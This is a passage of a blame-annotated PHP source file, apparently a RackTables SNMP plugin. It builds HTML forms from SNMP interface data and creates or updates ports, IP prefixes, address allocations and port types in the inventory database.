$object['attr'][$attr_id]['value']) 30bf198b 1411 $attr['uncheck'] = 'Current = new value'; 9276dc97 1412 a2ce4850 1413 if(isset($attr['key']) && isset($object['attr'][$attr_id]['key'])) 1414 { 1415 if($attr['key'] == $object['attr'][$attr_id]['key']) 1416 $attr['uncheck'] = 'Current = new key'; 1417 } 1418 9276dc97 ME 1419 $value = $attr['value']; 1420 1421 $val_key = (isset($object['attr'][$attr_id]['key']) ? ' ('.$object['attr'][$attr_id]['key'].')' : '' ); 1422 $comment = ''; 1423 1424 if(isset($attr['comment'])) { 1425 if(!empty($attr['comment'])) 1426 $comment = $attr['comment']; 1427 } 1428 1429 if(isset($attr['uncheck'])) { 1430 $checked = ''; 1431 $comment .= ', '.$attr['uncheck']; 1432 } else { 1433 $checked = ' checked="checked"'; 1434 } 1435 1436 $updateattrcheckbox = '<b style="background-color:#00ff00">' 1437 .'<input style="background-color:#00ff00" class="attribute" type="checkbox" name="updateattr['.$attr_id.']" value="'.$value.'"' 1438 .$checked.'></b>'; 1439 1440 $comment = trim($comment,', '); 1441 1442 echo "<tr><td>$updateattrcheckbox</td><td title=\"id: $attr_id\">" 1443 .$object['attr'][$attr_id]['name'].'</td><td style="background-color:#d8d8d8">' 1444 .$object['attr'][$attr_id]['value'].$val_key.'</td><td>'.$value.'</td>' 1445 .'<td style="color:#888888">'.$comment.'</td></tr>'; 1446 } 1447 } 1448 unset($attr_id); 1449 1450 echo '</table>'; 1451 a2ce4850 1452 $object['breed'] = sg_detectDeviceBreedByObject($sysObjectID); 1453 1454 if(!empty($object['breed'])) 1455 echo "Found Breed: ".$object['breed']."<br>"; 1456 9276dc97 ME 1457 /* ports */ 1458 1459 /* get ports */ 1460 amplifyCell($object); 1461 a2ce4850 1462 /* set array key to lowercase port name */ 9276dc97 1463 foreach($object['ports'] as $key => $values) { a2ce4850 1464 $object['ports'][strtolower(shortenIfName($values['name'], $object['breed']))] = $values; 9276dc97 ME 1465 unset($object['ports'][$key]); 1466 } 1467 1468 $newporttypeoptions = getNewPortTypeOptions(); 1469 1470// sg_var_dump_html($sysObjectID['port']); 1471 1472 if(!empty($sysObjectID['port'])) { 1473 1474 echo '<br>Vendor / Device specific ports<br>'; 1475 echo '<table><tr><th><input type="checkbox" id="moreport" checked="checked" onclick="setchecked(this.id)"></th><th>ifName</th><th>porttypeid</th></tr>'; 30bf198b 1476 9276dc97 ME 1477 foreach($sysObjectID['port'] as $name => $port) { 1478 a2ce4850 1479 if(array_key_exists(strtolower($name),$object['ports'])) 9276dc97 ME 1480 $disableport = TRUE; 1481 else 1482 $disableport = FALSE; 1483 1484 $comment = ''; 1485 1486 if(isset($port['comment'])) { 1487 if(!empty($port['comment'])) 1488 $comment = $port['comment']; 1489 } 1490 if(isset($port['uncheck'])) { 1491 $checked = ''; 1492 $comment .= ', '.$port['uncheck']; 1493 } else { 1494 $checked = ' checked="checked"'; 1495 } 1496 1497 $portcreatecheckbox = '<b style="background-color:'.($disableport ? '#ff0000' : '#00ff00') 1498 .'"><input style="background-color:'.($disableport ? '#ff0000' : '#00ff00').'" class="moreport" type="checkbox" name="portcreate['.$name.']" value="'.$name.'"' 1499 .($disableport ? ' disabled="disbaled"' : $checked ).'></b>'; 1500 1501 $formfield = '<input type="hidden" name="ifName['.$name.']" value="'.$name.'">'; 1502 echo "<tr>$formfield<td>$portcreatecheckbox</td><td>$name</td>"; 1503 1504 if(isset($port['disabled'])) { 1505 $disabledselect = array('disabled' => "disabled"); 1506 } else 1507 $disabledselect = array(); 1508 1509 1510 foreach($port as $key => $value) { 1511 1512 if($key == 'uncheck' || $key == 'comment') 1513 continue; 30bf198b 1514 9276dc97 ME 1515 /* TODO iif_name */ 1516 if($key == 'porttypeid') 1517 $displayvalue = getNiftySelect($newporttypeoptions, 1518 array('name' => "porttypeid[$name]") + $disabledselect, $value); 1519 /* disabled formfied won't be submitted ! */ 30bf198b 1520 else 9276dc97 ME 1521 $displayvalue = $value; 1522 1523 $formfield = '<input type="hidden" name="'.$key.'['.$name.']" value="'.$value.'">'; 1524 echo "$formfield<td>$displayvalue</td>"; 1525 } 1526 1527 $comment = trim($comment,', '); 1528 echo "<td style=\"color:#888888\">$comment</td></tr>"; 1529 } 1530 unset($name); 1531 unset($port); 30bf198b 1532 9276dc97 ME 1533 echo '</table>'; 1534 } 1535 1536 /* snmp ports */ 1537 1538 $ifsnmp = new ifSNMP($snmpdev); 1539 a2ce4850 1540 // needed for shortenIfName() 1541 $ifsnmp->object_breed = $object['breed']; 1542 9276dc97 ME 1543 /* ip spaces */ 1544 1545 $ipspace = NULL; 1546 foreach($ifsnmp->ipaddress as $ifindex => $ipaddresses) { 1547 1548 foreach($ipaddresses as $ipaddr => $value) { 1549 $addrtype = $value['addrtype']; 1550 $netaddr = $value['net']; 1551 $maskbits = $value['maskbits']; 1552 $netid = NULL; 1553 $linklocal = FALSE; 1554 30bf198b 1555 //echo "<br> - DEBUG: ipspace $ipaddr - $netaddr - $addrtype - $maskbits<br>"; 1556 9276dc97 ME 1557 /* check for ip space */ 1558 switch($addrtype) { 1559 case 'ipv4': 1560 case 'ipv4z': cc6eb4ee 1561 if($maskbits == 32) 1562 $netid = 'host'; 1563 else 1564 $netid = getIPv4AddressNetworkId(ip_parse($ipaddr)); 9276dc97 1565 break; 30bf198b 1566 9276dc97 1567 case 'ipv6': 30bf198b 1568 2141ed46 1569 if(ip_checkparse($ipaddr) === false) 1570 { 1571 /* format ipaddr for ip6_parse */ 1572 $ipaddr = preg_replace('/((..):(..))/','\\2\\3',$ipaddr); 1573 $ipaddr = preg_replace('/%.*$/','',$ipaddr); 1574 } 9276dc97 1575 1fc7fc7d 1576 if(ip_checkparse($ipaddr) === false) 1577 continue(2); // 2 because of switch 1578 30bf198b 1579 $ip6_bin = ip6_parse($ipaddr); 1580 $ip6_addr = ip_format($ip6_bin); 1581 $netid = getIPv6AddressNetworkId($ip6_bin); 1582 1583 $node = constructIPRange($ip6_bin, $maskbits); 1584 1585 $netaddr = $node['ip']; 1586 $linklocal = substr($ip6_addr,0,5) == "fe80:"; 1587 1588 //echo "<br> - DEBUG: ipspace $ipaddr - $addrtype - $maskbits - $netaddr - >$linklocal<<br>"; 1589 9276dc97 ME 1590 break; 1591 1592 case 'ipv6z': 1593 /* link local */ 1594 $netid = 'ignore'; 1595 break; 1596 default: 1597 } 30bf198b 1598 9276dc97 ME 1599 if(empty($netid) && $netaddr != '::1' && $netaddr != '127.0.0.1' && $netaddr != '127.0.0.0' && $netaddr != '0.0.0.0' && !$linklocal) { 1600 1601 $netaddr .= "/$maskbits"; 92ab1a62 1602 $ipspace[$netaddr] = array('addrtype' => $addrtype, 'checked' => ($maskbits > 0 ? true : false)); 9276dc97 ME 1603 } 1604 } 1605 unset($ipaddr); 1606 unset($value); 1607 unset($addrtype); 1608 } 1609 unset($ifindex); 1610 unset($ipaddresses); 1611 1612 /* print ip spaces table */ 1613 if(!empty($ipspace)) { 1614 echo '<br><br>Create IP Spaces'; 1615 echo '<table><tr><th><input type="checkbox" id="ipspace" onclick="setchecked(this.id)" checked=\"checked\"></th>'; 1616 echo '<th>Type</th><th>prefix</th><th>name</th><th width=150 title="reserve network and router addresses">reserve network / router addresses</th></tr>'; 30bf198b 1617 9276dc97 1618 $i = 1; 92ab1a62 1619 foreach($ipspace as $prefix => $ipspace) { 30bf198b 1620 9276dc97 ME 1621 $netcreatecheckbox = '<b style="background-color:#00ff00">' 1622 .'<input class="ipspace" style="background-color:#00ff00" type="checkbox" name="netcreate[' 92ab1a62 1623 .$i.']" value="'.$ipspace['addrtype'].'"'.($ipspace['checked'] ? ' checked=\"checked\"' : '').'></b>'; 9276dc97 ME 1624 1625 $netprefixfield = '<input type="text" size=50 name="netprefix['.$i.']" value="'.$prefix.'">'; 1626 1627 $netnamefield = '<input type="text" name="netname['.$i.']">'; 1628 b67f998d 1629 $netreservecheckbox = '<input type="checkbox" name="netreserve['.$i.']" checked="checked">'; 9276dc97 1630 92ab1a62 1631 echo "<tr><td>$netcreatecheckbox</td><td style=\"color:#888888\">${ipspace['addrtype']}</td><td>$netprefixfield</td><td>$netnamefield</td><td>$netreservecheckbox</td></tr>"; 9276dc97 ME 1632 1633 $i++; 1634 } 1635 unset($prefix); 1636 unset($addrtype); 1637 unset($i); 1638 1639 echo '</table>'; 1640 } 1641 1642 ccf830c6 1643 echo "<br><br>ifNumber: ".$ifsnmp->ifNumber."<br>indexcount: ".$ifsnmp->indexcount."<br><table><tbody valign=\"top\">"; 9276dc97 ME 1644 1645 $portcompat = getPortInterfaceCompat(); 1646 1647 $ipnets = array(); 1648 c7fc6067 1649 $ifsnmp->printifInfoTableHeader("<th>add ip</th><th>add port</th><th>upd label</th><th title=\"update mac\">upd mac</th><td>upd port type</th><th>porttypeid</th><th>comment</th></tr>"); 9276dc97 ME 1650 1651 echo '<tr><td colspan="11"></td> 2141ed46 1652 <td><input type="checkbox" id="ipaddr" onclick="setchecked(this.id);" checked="checked">IPv4<br> 1653 <input type="checkbox" id="ipv6addr" onclick="setchecked(this.id);" checked="checked">IPv6</td> 9276dc97 1654 <td><input type="checkbox" id="ports" onclick="setchecked(this.id)"></td> 2141ed46 1655 <td><input type="checkbox" id="label" onclick="setchecked(this.id);" checked="checked"></td> 1656 <td><input type="checkbox" id="mac" onclick="setchecked(this.id);" checked="checked"></td> b9680799 1657 <td><input type="checkbox" id="porttype" onclick="setchecked(this.id);"></td></tr>'; 9276dc97 ME 1658 1659 foreach($ifsnmp as $if) { 1660 1661 $createport = TRUE; 1662 $disableport = FALSE; 1663 $ignoreport = FALSE; 1664 $port_info = NULL; c7fc6067 1665 $updatelabel = false; cb15032d 1666 $updateporttype = false; 9276dc97 ME 1667 1668 $updatemaccheckbox = ''; 1669 1670 $hrefs = array(); 1671 1672 $comment = ""; 1673 1674 if(trim($ifsnmp->ifName($if)) == '') { 1675 $comment .= "no ifName"; 1676 $createport = FALSE; 1677 } else { 1678 1679 if(array_key_exists($ifsnmp->ifName($if),$object['ports'])){ 1680 $port_info = &$object['ports'][$ifsnmp->ifName($if)]; 1681 $comment .= "Name exists"; c7fc6067 1682 1683 /* ifalias change */ 1684 if($port_info['label'] != $ifsnmp->ifAlias($if)) 1685 $updatelabel = true; 1686 9276dc97 ME 1687 $createport = FALSE; 1688 $disableport = TRUE; 1689 } 1690 } 1691 1692 if($ifsnmp->ifPhysAddress($if) != '' ) { 1693 1694 $ifPhysAddress = $ifsnmp->ifPhysAddress($if); 1695 1696 $l2port = sg_checkL2Address($ifPhysAddress); 1697 9276dc97 1698 if(!empty($l2port)) { c7fc6067 1699 9276dc97 ME 1700 $l2object_id = key($l2port); 1701 1702 $porthref = makeHref(array('page'=>'object', 'tab' => 'ports', 1703 'object_id' => $l2object_id, 'hl_port_id' => $l2port[$l2object_id])); 1704 1705 $comment .= ", L2Address exists"; 1706 $hrefs['ifPhysAddress'] = $porthref; 1707 $createport = FALSE; 1708 // $disableport = TRUE; 1709 $updatemaccheckbox = ''; 1710 } 1711 1712 $disablemac = true; 30bf198b 1713 if($disableport) { 9276dc97 ME 1714 if($port_info !== NULL) { 1715 if(str_replace(':','',$port_info['l2address']) != $ifPhysAddress) 1716 $disablemac = false; 1717 else 1718 $disablemac = true; 1719 } 1720 } else { 1721 /* port create always updates mac */ 1722 $updatemaccheckbox = '<b style="background-color:#00ff00">' 1723 .'<input style="background-color:' 1724 .'#00ff00" type="checkbox"' 1725 .' checked="checked"' 1726 .' disabled=\"disabled\"></b>'; 1727 } 1728 1729 if(!$disablemac) 1730 $updatemaccheckbox = '<b style="background-color:'.($disablemac ? '#ff0000' : '#00ff00').'">' 1731 .'<input class="mac" style="background-color:' 1732 .($disablemac ? '#ff0000' : '#00ff00').'" type="checkbox" name="updatemac['.$if.']" value="' 1733 .$object['ports'][$ifsnmp->ifName($if)]['id'].'" checked="checked"' 1734 .($disablemac ? ' disabled=\"disabled\"' : '' ).'></b>'; 30bf198b 1735 9276dc97 ME 1736 } 1737 1738 1739 $porttypeid = guessRToif_id($ifsnmp->ifType($if), $ifsnmp->ifDescr($if)); 1740 1741 if(in_array($ifsnmp->ifType($if),$sg_ifType_ignore)) { 1742 $comment .= ", ignore if type"; 1743 $createport = FALSE; 1744 $ignoreport = TRUE; 1745 } cb15032d 1746 else 1747 { 1748 if($port_info) 1749 { 1750 $ptid = $port_info['iif_id']."-".$port_info['oif_id']; 1751 if($porttypeid != $ptid) 1752 { 1753 $comment .= ", Update Type $ptid -> $porttypeid"; 1754 $updateporttype = true; 1755 } 1756 } 1757 } 30bf198b 1758 9276dc97 ME 1759 /* ignore ports without an Connector */ 1760 if(!$sg_create_noconnector_ports && ($ifsnmp->ifConnectorPresent($if) == 2)) { 1761 $comment .= ", no Connector"; 1762 $createport = FALSE; 1763 } 1764 9276dc97 ME 1765 /* Allocate IPs ipv4 and ipv6 */ 1766 1767 $ipaddresses = $ifsnmp->ipaddress($if); 30bf198b 1768 9276dc97 ME 1769 if(!empty($ipaddresses)) { 1770 1771 $ipaddrcell = '<table>'; 1772 1773 foreach($ipaddresses as $ipaddr => $value) { 1774 $createipaddr = FALSE; 1775 $disableipaddr = FALSE; 1776 $ipaddrhref = ''; 1777 $linklocal = FALSE; 30bf198b 1778 9276dc97 ME 1779 $addrtype = $value['addrtype']; 1780 $maskbits = $value['maskbits']; 1781 $bcast = $value['bcast']; 1782 30bf198b 1783 //echo "<br> - DEBUG: ip $ipaddr - $addrtype - $maskbits - $bcast<br>"; 1784 9276dc97 ME 1785 switch($addrtype) { 1786 case 'ipv4z': 1787 case 'ipv4': cc6eb4ee 1788 if($maskbits == 32) 1789 $bcast = "host"; 1790 9276dc97 ME 1791 $inputname = 'ip'; 1792 break; 30bf198b 1793 9276dc97 ME 1794 case 'ipv6z': 1795 $disableipaddr = TRUE; 1796 case 'ipv6': 1797 $inputname = 'ipv6'; 1798 2141ed46 1799 if(ip_checkparse($ipaddr) === false) 1800 { 1801 /* format ipaddr for ip6_parse */ 1802 $ipaddr = preg_replace('/((..):(..))/','\\2\\3',$ipaddr); 1803 $ipaddr = preg_replace('/%.*$/','',$ipaddr); 1804 } 30bf198b 1805 1fc7fc7d 1806 if(ip_checkparse($ipaddr) === false) 1807 continue(2); // 2 because of switch 1808 30bf198b 1809 /* ip_parse throws exception on parse errors */ 1810 $ip6_bin = ip_parse($ipaddr); 1811 $ipaddr = ip_format($ip6_bin); 1812 1813 $node = constructIPRange($ip6_bin, $maskbits); 1814 1815 $linklocal = ($node['ip'] == 'fe80::'); 9276dc97 ME 1816 1817 $createipaddr = FALSE; 1818 break; 1819 30bf198b 1820 } //switch 1821 1822 $address = getIPAddress(ip_parse($ipaddr)); 9276dc97 ME 1823 1824 /* only if ip not already allocated */ 1825 if(empty($address['allocs'])) { 30bf198b 1826 if(!$ignoreport) { 9276dc97 1827 $createipaddr = TRUE; 30bf198b 1828 } 9276dc97 ME 1829 } else { 1830 $disableipaddr = TRUE; 30bf198b 1831 9276dc97 1832 $ipobject_id = $address['allocs'][0]['object_id']; 30bf198b 1833 9276dc97 ME 1834 $ipaddrhref = makeHref(array('page'=>'object', 1835 'object_id' => $ipobject_id, 'hl_ipv4_addr' => $ipaddr)); 30bf198b 1836 9276dc97 1837 } 30bf198b 1838 9276dc97 ME 1839 /* reserved addresses */ 1840 if($address['reserved'] == 'yes') { 1841 $comment .= ', '.$address['ip'].' reserved '.$address['name']; 1842 $createipaddr = FALSE; 1843 // $disableipaddr = TRUE; 1844 } 1845 1846 if($ipaddr == '127.0.0.1' || $ipaddr == '0.0.0.0' || $ipaddr == '::1' || $ipaddr == '::' || $linklocal) { 1847 $createipaddr = FALSE; 1848 $disableipaddr = TRUE; 1849 } 1850 1851 if($ipaddr === $bcast) { 1852 $comment .= ", $ipaddr broadcast"; 1853 $createipaddr = FALSE; 1854 $disableipaddr = TRUE; 1855 } 1856 30bf198b 1857 if(!$disableipaddr) { 1858 $ipaddrcheckbox = '<b style="background-color:'.($disableipaddr ? '#ff0000' : '#00ff00') 1859 .'"><input class="'.$inputname.'addr" style="background-color:' 1860 .($disableipaddr ? '#ff0000' : '#00ff00') 1861 .'" type="checkbox" name="'.$inputname.'addrcreate['.$ipaddr.']" value="'.$if.'"' 1862 .($disableipaddr ? ' disabled="disabled"' : '') 1863 .($createipaddr ? ' checked="checked"' : '').'></b>'; 1864 } else { 1865 $ipaddrcheckbox = ''; 1866 } 9276dc97 ME 1867 1868 $ipaddrcell .= "<tr><td>$ipaddrcheckbox</td>"; 1869 30bf198b 1870 if(!empty($ipaddrhref)) { 9276dc97 1871 $ipaddrcell .= "<td><a href=$ipaddrhref>$ipaddr/$maskbits</a></td></tr>"; 30bf198b 1872 } else { 9276dc97 1873 $ipaddrcell .= "<td>$ipaddr/$maskbits</td></tr>"; 30bf198b 1874 } 9276dc97 1875 30bf198b 1876 } // foreach 9276dc97 ME 1877 unset($ipaddr); 1878 unset($value); 30bf198b 1879 9276dc97 1880 $ipaddrcell .= '</table>'; 30bf198b 1881 1882 // if(!empty($ipaddresses)) 9276dc97 ME 1883 } else { 1884 $ipaddrcreatecheckbox = ''; 1885 $ipaddrcell = ''; 9276dc97 ME 1886 } 1887 9276dc97 1888 /* checkboxes for add port and add ip */ 30bf198b 1889 /* FireFox needs <b style=..>, IE and Opera work with <td style=..> */ 9276dc97 ME 1890 if(!$disableport) 1891 $portcreatecheckbox = '<b style="background-color:'.($disableport ? '#ff0000' : '#00ff00') 1892 .'"><input class="ports" style="background-color:'.($disableport ? '#ff0000' : '#00ff00') 1893 .'" type="checkbox" name="portcreate['.$if.']" value="'.$if.'"' 1894 .($disableport ? ' disabled="disbaled"' : '').($createport ? ' checked="checked"' : '').'></b>'; 1895 else 1896 $portcreatecheckbox = ''; 30bf198b 1897 9276dc97 ME 1898 /* port type id */ 1899 /* add port type to newporttypeoptions if missing */ 1900 if(strpos(serialize($newporttypeoptions),$porttypeid) === FALSE) { 1901 1902 $portids = explode('-',$porttypeid); 1903 $oif_name = $sg_portoifoptions[$portids[1]]; 1904 30bf198b 1905 $newporttypeoptions['auto'] = array($porttypeid => "*$oif_name"); 9276dc97 ME 1906 } 1907 1908 $selectoptions = array('name' => "porttypeid[$if]"); 1909 cb15032d 1910 if($disableport && !$updateporttype) 9276dc97 ME 1911 $selectoptions['disabled'] = "disabled"; 1912 cb15032d 1913 $updateporttypecheckbox = ""; 1914 cb15032d 1915 if($updateporttype) 1916 $updateporttypecheckbox = '<b style="background-color:#00ff00;">' 1917 .'<input class="porttype" style="background-color:#00ff00;" type="checkbox" name="updateporttype['.$if.']" value="' b9680799 1918 .$port_info['id'].'"></b>'; cb15032d 1919 9276dc97 ME 1920 $porttypeidselect = getNiftySelect($newporttypeoptions, $selectoptions, $porttypeid); 1921 c7fc6067 1922 $updatelabelcheckbox = ""; 1923 1924 if($updatelabel) 1925 $updatelabelcheckbox = '<b style="background-color:#00ff00;">' 1926 .'<input class="label" style="background-color:#00ff00;" type="checkbox" name="updatelabel['.$if.']" value="' 1927 .$port_info['id'].($updatelabel ? '" checked="checked"' : '' ).'></b>'; 1928 9276dc97 ME 1929 $comment = trim($comment,', '); 1930 c7fc6067 1931 $ifsnmp->printifInfoTableRow($if,"<td>$ipaddrcell</td><td>$portcreatecheckbox</td><td>$updatelabelcheckbox</td><td>$updatemaccheckbox</td><td>$updateporttypecheckbox</td><td>$porttypeidselect</td><td nowrap=\"nowrap\">$comment</td>", $hrefs); 9276dc97 ME 1932 1933 } 1934 unset($if); 1935 1936 /* preserve snmpconfig */ 1937 foreach($_POST as $key => $value) { 1938 echo '<input type=hidden name='.$key.' value='.$value.' />'; 1939 } 1940 unset($key); 1941 unset($value); 1942 1943 echo '<tr><td colspan=15 align="right"><p><input id="createbutton" type=submit value="Create Ports and IPs" onclick="return confirm(\'Create selected items?\')"></p></td></tr></tbody></table></form>'; 1944 ccf830c6 1945} // END function snmpgeneric_list 9276dc97 ME 1946 1947/* -------------------------------------------------- */ 1948function snmpgeneric_opcreate() { 1949 1950 $object_id = $_REQUEST['object_id']; 1951 $attr = getAttrValues($object_id); 1952 1953// sg_var_dump_html($_REQUEST); 1954// sg_var_dump_html($attr); 1955 1956 /* commitUpdateAttrValue ($object_id, $attr_id, $new_value); */ 1957 if(isset($_POST['updateattr'])) { 1958 foreach($_POST['updateattr'] as $attr_id => $value) { 1959 // if(empty($attr[$attr_id]['value'])) 1960 if(!empty($value)) { 1961 commitUpdateAttrValue ($object_id, $attr_id, $value); 1962 showSuccess("Attribute ".$attr[$attr_id]['name']." set to $value"); 1963 } 1964 } 1965 unset($attr_id); 1966 unset($value); 1967 } 1968 /* updateattr */ 1969 1970 /* create ports */ 1971 if(isset($_POST['portcreate'])) { 1972 foreach($_POST['portcreate'] as $if => $value) { 1973 1974 $ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' ); 1975 $ifPhysAddress = (isset($_POST['ifPhysAddress'][$if]) ? trim($_POST['ifPhysAddress'][$if]) : '' ); 1976 $ifAlias = (isset($_POST['ifAlias'][$if]) ? trim($_POST['ifAlias'][$if]) : '' ); 1977 $ifDescr = (isset($_POST['ifDescr'][$if]) ? trim($_POST['ifDescr'][$if]) : '' ); 1978 649076d7 1979 //$visible_label = (empty($ifAlias) ? '' : $ifAlias.'; ').$ifDescr; 1980 $visible_label = $ifAlias; 9276dc97 ME 1981 1982 if(empty($ifName)) { 1983 showError('Port without ifName '.$_POST['porttypeid'][$if].', '.$visible_label.', '.$ifPhysAddress); 1984 } else { 30bf198b 1985 commitAddPort ($object_id, $ifName, $_POST['porttypeid'][$if], $visible_label, $ifPhysAddress); 9276dc97 ME 1986 showSuccess('Port created '.$ifName.', '.$_POST['porttypeid'][$if].', '.$visible_label.', '.$ifPhysAddress); 1987 } 1988 } 1989 unset($if); 1990 unset($value); 1991 } 1992 /* portcreate */ 1993 1994 /* net create */ 1995 if(isset($_POST['netcreate'])) { 1996 foreach($_POST['netcreate'] as $id => $addrtype) { 1997 $range = $_POST['netprefix'][$id]; 1998 $name = $_POST['netname'][$id]; 1999 $is_reserved = isset($_POST['netreserve'][$id]); 2000 2001 if($addrtype == 'ipv4' || $addrtype == 'ipv4z') 2002 createIPv4Prefix($range, $name, $is_reserved); 2003 else 2004 createIPv6Prefix($range, $name, $is_reserved); 2005 2006 showSuccess("$range $name created"); 2007 2008 } 2009 unset($id); 2010 unset($addrtype); 2011 } 2012 /* netcreate */ 2013 2014 /* allocate ipv6 adresses */ 2015 if(isset($_POST['ipv6addrcreate'])) { 30bf198b 2016 foreach($_POST['ipv6addrcreate'] as $ipaddr => $if) { 2017 2018 bindIPv6ToObject(ip6_parse($ipaddr), $object_id,$_POST['ifName'][$if], 1); /* connected */ 2019 showSuccess("$ipaddr allocated"); 9276dc97 ME 2020 } 2021 unset($ipaddr); 2022 unset($if); 2023 } 2024 /* allocate ip adresses */ 2025 if(isset($_POST['ipaddrcreate'])) { 30bf198b 2026 foreach($_POST['ipaddrcreate'] as $ipaddr => $if) { 9276dc97 2027 30bf198b 2028 bindIPToObject(ip_parse($ipaddr), $object_id,$_POST['ifName'][$if], 1); /* connected */ 2029 showSuccess("$ipaddr allocated"); 9276dc97 ME 2030 } 2031 unset($ipaddr); 2032 unset($if); 2033 } 2034 /* ipaddrecreate */ 2035 c7fc6067 2036 /* update label */ 2037 if(isset($_POST['updatelabel'])) { 2038 foreach($_POST['updatelabel'] as $if => $port_id) { 2039 2040 $ifAlias = (isset($_POST['ifAlias'][$if]) ? trim($_POST['ifAlias'][$if]) : '' ); 2041 2042 sg_commitUpdatePortLabel($object_id, $port_id, $ifAlias); 2043 2044 $ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' ); 2045 showSuccess("label updated on $ifName to $ifAlias"); 2046 } 2047 unset($if); 2048 unset($port_id); 2049 } 2050 /* updatemac */ 2051 9276dc97 ME 2052 /* update mac addresses only */ 2053 if(isset($_POST['updatemac'])) { 2054 foreach($_POST['updatemac'] as $if => $port_id) { 2055 2056 $ifPhysAddress = (isset($_POST['ifPhysAddress'][$if]) ? trim($_POST['ifPhysAddress'][$if]) : '' ); 2057 2058 sg_commitUpdatePortl2address($object_id, $port_id, $ifPhysAddress); 2059 2060 $ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' ); 2061 showSuccess("l2address updated on $ifName to $ifPhysAddress"); 2062 } 2063 unset($if); 2064 unset($port_id); 2065 } 2066 /* updatemac */ 2067 cb15032d 2068 /* update port type */ 2069 if(isset($_POST['updateporttype'])) { 2070 foreach($_POST['updateporttype'] as $if => $port_id) { 2071 2072 $porttypeid = (isset($_POST['porttypeid'][$if]) ? trim($_POST['porttypeid'][$if]) : '' ); 2073 2074 sg_commitUpdatePortType($object_id, $port_id, $porttypeid); 2075 2076 $ifName = (isset($_POST['ifName'][$if]) ? trim($_POST['ifName'][$if]) : '' ); 2077 showSuccess("port type updated on $ifName"); 2078 } 2079 unset($if); 2080 unset($port_id); 2081 } 2082 /* updateporttype */ 9276dc97 ME 2083} /* snmpgeneric_opcreate */ 2084 2085/* -------------------------------------------------- */ 2086 2087/* returns RT interface type depending on ifType, ifDescr, .. */ 2088function guessRToif_id($ifType,$ifDescr = NULL) { 2089 global $sg_ifType2oif_id; 2090 global $sg_portiifoptions; 2091 global $sg_portoifoptions; 2092 2093 /* default value */ 2094 $retval = '24'; /* 1000BASE-T */ 2095 2096 if(isset($sg_ifType2oif_id[$ifType])) { 2097 $retval = $sg_ifType2oif_id[$ifType]; 2098 } 2099 2100 if(strpos($retval,'-') === FALSE) 2101 $retval = "1-$retval"; 2102 2103 /* no ethernetCsmacd */ 30bf198b 2104 if($ifType != 6) 9276dc97 ME 2105 return $retval; 2106 2107 2108 /* try to identify outer and inner interface type from ifDescr */ 2109 d257f4d9 2110 switch(true) 2111 { 2112 case preg_match('/fast.?ethernet/i',$ifDescr,$matches): 2113 // Fast Ethernet 2114 $retval = 19; 2115 break; 2116 case preg_match('/10.?gigabit.?ethernet/i',$ifDescr,$matches): 2117 // 10-Gigabit Ethernet 2118 $retval = 1642; 2119 break; 2120 case preg_match('/gigabit.?ethernet/i',$ifDescr,$matches): 2121 // Gigabit Ethernet 2122 $retval = 24; 2123 break; 2124 } 2125 9276dc97 ME 2126 /********************** 2127 * ifDescr samples 2128 * 2129 * Enterasys C3 2130 * 2131 * Unit: 1 1000BASE-T RJ45 Gigabit Ethernet Frontpanel Port 45 - no sfp inserted 2132 * Unit: 1 1000BASE-T RJ45 Gigabit Ethernet Frontpanel Port 47 - sfp 1000BASE-SX inserted 2133 * 2134 * 2135 * Enterasys S4 2136 * 2137 * Enterasys Networks, Inc. 1000BASE Gigabit Ethernet Port; No GBIC/MGBIC Inserted 2138 * Enterasys Networks, Inc. 1000BASE-SX Mini GBIC w/LC connector 2139 * Enterasys Networks, Inc. 10GBASE SFP+ 10-Gigabit Ethernet Port; No SFP+ Inserted 2140 * Enterasys Networks, Inc. 10GBASE-SR SFP+ 10-Gigabit Ethernet Port (850nm Short Wavelength, 33/82m MMF, LC) 2141 * Enterasys Networks, Inc. 1000BASE Gigabit Ethernet Port; Unknown GBIC/MGBIC Inserted 30bf198b 2142 * 9276dc97 ME 2143 */ 2144 2145 foreach($sg_portiifoptions as $iif_id => $iif_type) { 30bf198b 2146 9276dc97 ME 2147 /* TODO better matching */ 2148 2149 2150 /* find iif_type */ 2151 if(preg_match('/(.*?)('.preg_quote($iif_type).')(.*)/i',$ifDescr,$matches)) { 2152 2153 $oif_type = "empty ".$iif_type; 2154 2155 $no = preg_match('/ no $/i', $matches[1]); 2156 2157 if(preg_match('/(\d+[G]?)BASE[^ ]+/i', $matches[1], $basematch)) { 2158 $oif_type=$basematch[0]; 2159 } else { 2160 if(preg_match('/(\d+[G]?)BASE[^ ]+/i', $matches[3], $basematch)) { 2161 $oif_type=$basematch[0]; 2162 } 2163 } 2164 2165 if($iif_id == -1) { 2166 /* 2 => SFP-100 or 4 => SFP-1000 */ 2167 2168 if(isset($basematch[1])) { 2169 switch($basematch[1]) { 2170 case '100' : 2171 $iif_id = 2; 2172 $iif_type = "SFP-100"; 2173 break; 2174 default: 2175 case '1000' : 30bf198b 2176 $iif_id = 4; 9276dc97 ME 2177 $iif_type = "SFP-1000"; 2178 break; 2179 } 2180 } 30bf198b 2181 3049413e 2182 if(preg_match('/sfp 1000-sx/i',$ifDescr)) 2183 $oif_type = '1000BASE-SX'; 2184 2185 if(preg_match('/sfp 1000-lx/i',$ifDescr)) 2186 $oif_type = '1000BASE-LX'; 2187 9276dc97 ME 2188 } 2189 2190 if($no) { 2191 $oif_type = "empty ".$iif_type; 2192 } 2193 2194 $oif_type = preg_replace('/BASE/',"Base",$oif_type); 2195 2196 $oif_id = array_search($oif_type,$sg_portoifoptions); 2197 2198 if($oif_id != '') { 2199 $retval = "$iif_id-$oif_id"; 2200 } 2201 2202 /* TODO check port compat */ 2203 2204 /* stop foreach */ 2205 break; 2206 } 2207 } 2208 unset($iif_id); 2209 unset($iif_type); 2210 2211 if(strpos($retval,'-') === FALSE) 2212 $retval = "1-$retval"; 2213 2214 return $retval; 2215 2216} 2217 2218/* --------------------------------------------------- */ 2219 2220function sg_commitUpdatePortl2address($object_id, $port_id, $port_l2address) 2221{ 2222 $db_l2address = l2addressForDatabase ($port_l2address); 2223 2224 global $dbxlink; 2225 $dbxlink->exec ('LOCK TABLES Port WRITE'); 2226 if (alreadyUsedL2Address ($db_l2address, $object_id)) 2227 { 2228 $dbxlink->exec ('UNLOCK TABLES'); 2229 // FIXME: it is more correct to throw InvalidArgException here 2230 // and convert it to InvalidRequestArgException at upper level, 2231 